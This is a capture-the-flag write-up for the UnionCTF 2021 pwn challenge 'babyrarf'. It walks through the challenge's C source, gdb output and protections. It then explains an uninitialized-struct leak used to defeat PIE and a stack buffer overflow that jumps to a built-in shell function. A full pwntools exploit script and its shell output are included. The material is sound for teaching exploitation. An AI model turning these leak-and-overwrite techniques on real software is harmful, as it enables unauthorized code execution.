[UnionCTF 2021 - pwn] babyrarf

The binary can be found right here.

[UnionCTF] Babyrarf#

Welcome guys,

This Write-Up is about de first pwn challenge of unionctf: babyrarf. It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).

Let’s take a look at the src!

1
#include <stdio.h>
2
#include <stdlib.h>
3
#include <stdint.h>
4
#include <unistd.h>
5

6
typedef struct attack {
7
    uint64_t id;
8
    uint64_t dmg;
9
} attack;
10

11
typedef struct character {
12
    char name[10];
13
    int health;
14
} character;
15

16
uint8_t score;
17

18
int read_int(){
19
    char buf[10];
20
    fgets(buf, 10, stdin);
21
    return atoi(buf);
22
}
23

24
void get_shell(){
25
    execve("/bin/sh", NULL, NULL);
26
}
27

28
attack choose_attack(){
29
    attack a;
30
    int id;
31
    puts("Choose an attack:\n");
32
    puts("1. Knife\n");
33
    puts("2. A bigger knife\n");
34
    puts("3. Her Majesty's knife\n");
35
    puts("4. A cr0wn\n");
36
    id = read_int();
37
    if (id == 1){
38
        a.id = 1;
39
        a.dmg = 10;
40
    }
41
    else if (id == 2){
42
        a.id = 2;
43
        a.dmg = 20;
44
    }
45
    else if (id == 3){
46
        a.id = 3;
47
        a.dmg = 30;
48
    }
49
    else if (id == 4){
50
        if (score == 0){
51
            puts("l0zers don't get cr0wns\n");
52
        }
53
        else{
54
            a.id = 4;
55
            a.dmg = 40;
56
        }
57
    }
58
    else{
59
        puts("Please select a valid attack next time\n");
60
        a.id = 0;
61
        a.dmg = 0;
62
    }
63
    return a;
64
}
65

66
int main(){
67
    character player = { .health = 100};
68
    character boss = { .health = 100, .name = "boss"};
69
    attack a;
70
    int dmg;
71

72
    setvbuf(stdin, NULL, _IONBF, 0);
73
    setvbuf(stdout, NULL, _IONBF, 0);
74
    srand(0);
75

76
    puts("You are fighting the rarf boss!\n");
77
    puts("What is your name?\n");
78
    fgets(player.name, 10, stdin);
79

80
    score = 10;
81

82
    while (score < 100){
83
        a = choose_attack();
84
        printf("You choose attack %llu\n", a.id);
85
        printf("You deal %llu dmg\n", a.dmg);
86
        boss.health -= a.dmg;
87
        dmg = rand() % 100;
88
        printf("The boss deals %llu dmg\n", dmg);
89
        player.health -= dmg;
90
        if (player.health > boss.health){
91
            puts("You won!\n");
92
            score += 1;
93
        }
94
        else{
95
            puts("You lost!\n");
96
            score -= 1;
97
        }
98
        player.health = 100;
99
        boss.health = 100;
100
    }
101

102
    puts("Congratulations! You may now declare yourself the winner:\n");
103
    fgets(player.name, 48, stdin);
104
    return 0;
105
}

It’s basically some kind of game, we have to win a lot of times to display Congratulations! You may now declare yourself the winner. And when we reach this part we can trigger a buffer overflow with a call to fgets (fgets(player.name, 48, stdin);). We notice too the get_shell function (maybe we will have to jump on ?).

Let’s take a look at gdb:

1
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
2
0x00007fffffffdf48│+0x0000: 0x00007ffff7dd30b3  →  <__libc_start_main+243> mov edi, eax   ← $rsp
3
0x00007fffffffdf50│+0x0008: 0x00007ffff7ffc620  →  0x0005081200000000
4
0x00007fffffffdf58│+0x0010: 0x00007fffffffe038  →  0x00007fffffffe357  →  "/home/nasm/dist/babyrarf"
5
0x00007fffffffdf60│+0x0018: 0x0000000100000000
6
0x00007fffffffdf68│+0x0020: 0x00005555555552e4  →  <main+0> push rbp
7
0x00007fffffffdf70│+0x0028: 0x00005555555554d0  →  <__libc_csu_init+0> endbr64
8
0x00007fffffffdf78│+0x0030: 0xdb21ca7fd193f05a
9
0x00007fffffffdf80│+0x0038: 0x00005555555550b0  →  <_start+0> endbr64
10
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
11
   0x5555555552de <choose_attack+234> mov    rdx, QWORD PTR [rbp-0x18]
12
   0x5555555552e2 <choose_attack+238> leave
13
   0x5555555552e3 <choose_attack+239> ret
14
 → 0x5555555552e4 <main+0>         push   rbp
15
   0x5555555552e5 <main+1>         mov    rbp, rsp
16
   0x5555555552e8 <main+4>         sub    rsp, 0x40
17
   0x5555555552ec <main+8>         mov    QWORD PTR [rbp-0x20], 0x0
18
   0x5555555552f4 <main+16>        mov    QWORD PTR [rbp-0x18], 0x0
19
   0x5555555552fc <main+24>        mov    DWORD PTR [rbp-0x14], 0x64
20
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
21
[#0] Id 1, Name: "babyrarf", stopped 0x5555555552e4 in main (), reason: BREAKPOINT
22
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
23
[#0] 0x5555555552e4 → main()
24
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
25
gef➤

And at the call to fgets:

1
   0x55555555537d <main+153>       lea    rax, [rbp-0x20]
2
   0x555555555381 <main+157>       mov    esi, 0xa
3
   0x555555555386 <main+162>       mov    rdi, rax
4
 → 0x555555555389 <main+165>       call   0x555555555060 <fgets@plt>
5
   ↳  0x555555555060 <fgets@plt+0>    jmp    QWORD PTR [rip+0x2fca]        # 0x555555558030 <fgets@got.plt>
6
      0x555555555066 <fgets@plt+6>    push   0x3
7
      0x55555555506b <fgets@plt+11>   jmp    0x555555555020
8
      0x555555555070 <execve@plt+0>   jmp    QWORD PTR [rip+0x2fc2]        # 0x555555558038 <execve@got.plt>
9
      0x555555555076 <execve@plt+6>   push   0x4
10
      0x55555555507b <execve@plt+11>  jmp    0x555555555020
11
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
12
fgets@plt (
13
   $rdi = 0x00007fffffffdf20 → 0x0000000000000000,
14
   $rsi = 0x000000000000000a,
15
   $rdx = 0x00007ffff7f97980 → 0x00000000fbad208b
16
)
17
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
18
[#0] Id 1, Name: "babyrarf", stopped 0x555555555389 in main (), reason: SINGLE STEP
19
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
20
[#0] 0x555555555389 → main()
21
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
22
gef➤

So main_ret_addr minus player.name is equal to: 0x00007fffffffdf48 - 0x00007fffffffdf20 = 40 . So we have basically a padding of 40 bytes before the return address, and according to the last fgets, we can only enter 48 bytes. We can so overwrite only the return address.

Now we can take a look at the permissions:

1
gef➤  checksec
2
[+] checksec for '/home/nasm/dist/babyrarf'
3
Canary                        : ✘
4
NX                            : ✓
5
PIE                           : ✓
6
Fortify                       : ✘
7
RelRO                         : Partial

We can see, the binary is PIE based, so in order to jump on get_shell we need to leak some binary’s functions. To do so we can mind the code of choose_attack function:

1
attack choose_attack(){
2
    attack a;
3
    int id;
4
    /* Some print stuff */
5
    id = read_int(); // It is readinf the type of weapons we want
6

7
    /* Here it is handling properly dammage and weapon type */
8

9
    else if (id == 4){
10
        if (score == 0){
11
            puts("l0zers don't get cr0wns\n");
12
        }
13
        else{
14
            a.id = 4;
15
            a.dmg = 40;
16
        }
17
    }
18
    else{
19
        puts("Please select a valid attack next time\n");
20
        a.id = 0;
21
        a.dmg = 0;
22
    }
23
    return a;
24
}

The interesting part is that when our score is zero and that we choose the fourth weapon, the id et dmg fields are not initialized. And so it’s returning a non initialized struct that it will print just next in the main function:

1
    /* ... */
2
    a = choose_attack();
3
    printf("You choose attack %llu\n", a.id);
4
    printf("You deal %llu dmg\n", a.dmg);
5
    /*...*/

Uninitialized structures are very useful to obtain leaks because their content is depending of the ancient stackframes which have stored local variables and especially useful pointers. And when we try to leak these datas, we can see that a.id displays the address of __lib_csu_init. So we just need to leak the address of __lib_csu_init to compute the base address of the binary and so the address of get_shell.

1
from pwn import *
2

3
#p = process("babyrarf")
4

5
r = remote('35.204.144.114', 1337)
6
e = ELF('babyrarf')
7

8
set_ = False
9
base = 0
10
csu_leak = 0
11

12
def padd(d):
13
    return d + '\00'*(8-len(d))
14

15
print(r.recvuntil("What is your name?\n\n"))
16
r.sendline("nasm")
17
print(r.recvuntil("4. A cr0wn\n\n"))
18
r.sendline("1")
19

20
while True:
21
    a = r.recvuntil("4. A cr0wn\n\n", timeout=1)
22

23
    if not a:
24
        break
25
    print(a)
26

27
    if not set_:
28
        r.sendline("4")
29
    else:
30
        r.sendline("1")
31

32
    b = r.recvuntil("You choose attack ")
33

34
    if "l0zers don't get cr0wns" in b:
35
        leak_csu = int(padd(r.recvline().replace("\n", "")))
36
        print("leak_csu={}".format(hex(int(leak_csu))))
37
        base = leak_csu - e.symbols['__libc_csu_init']
38

39
        print("base: {}".format(hex(base)))
40

41
        set_ = True
42

43
print(r.recvuntil("Congratulations! You may now declare yourself the winner:\n\n"))
44

45
#gdb.attach(p.pid)
46
r.sendline("A"*40 + p64(e.symbols['get_shell'] + base))
47
r.interactive()

We can compute compute the value of rand to avoid bruteforce, but I’ve choosen to do not. So while it does not print l0zers don't get cr0wns, I’m sending 4 for cr0wn and when it is teh case I get my leak of the csu and I compute the base address. When It’s done I’m sending 1 because it sounds more speed and I wait to win. And when I won I can trigger the buffer overflow and jmp on get_shell.

1
/* ... */
2
/* lot of iterations */
3
/* ... */
4

5
You deal 40 dmg
6
The boss deals 70 dmg
7
You lost!
8

9
Choose an attack:
10

11
1. Knife
12

13
2. A bigger knife
14

15
3. Her Majesty's knife
16

17
4. A cr0wn
18

19

20
leak_csu=0x55b3b5b3a4d0
21
base: 0x55b3b5b39000
22
You deal 140736258161760 dmg
23
The boss deals 96 dmg
24
You lost!
25

26
Congratulations! You may now declare yourself the winner:
27

28

29
[*] Switching to interactive mode
30
$ cat /home/babyrarf/flag.txt
31
union{baby_rarf_d0o_d00_do0_doo_do0_d0o}

The final script can be found here.

That’s all folks :)